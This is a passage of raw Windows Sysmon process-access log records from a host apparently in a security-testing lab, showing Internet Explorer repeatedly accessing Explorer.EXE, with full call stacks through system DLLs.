RAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
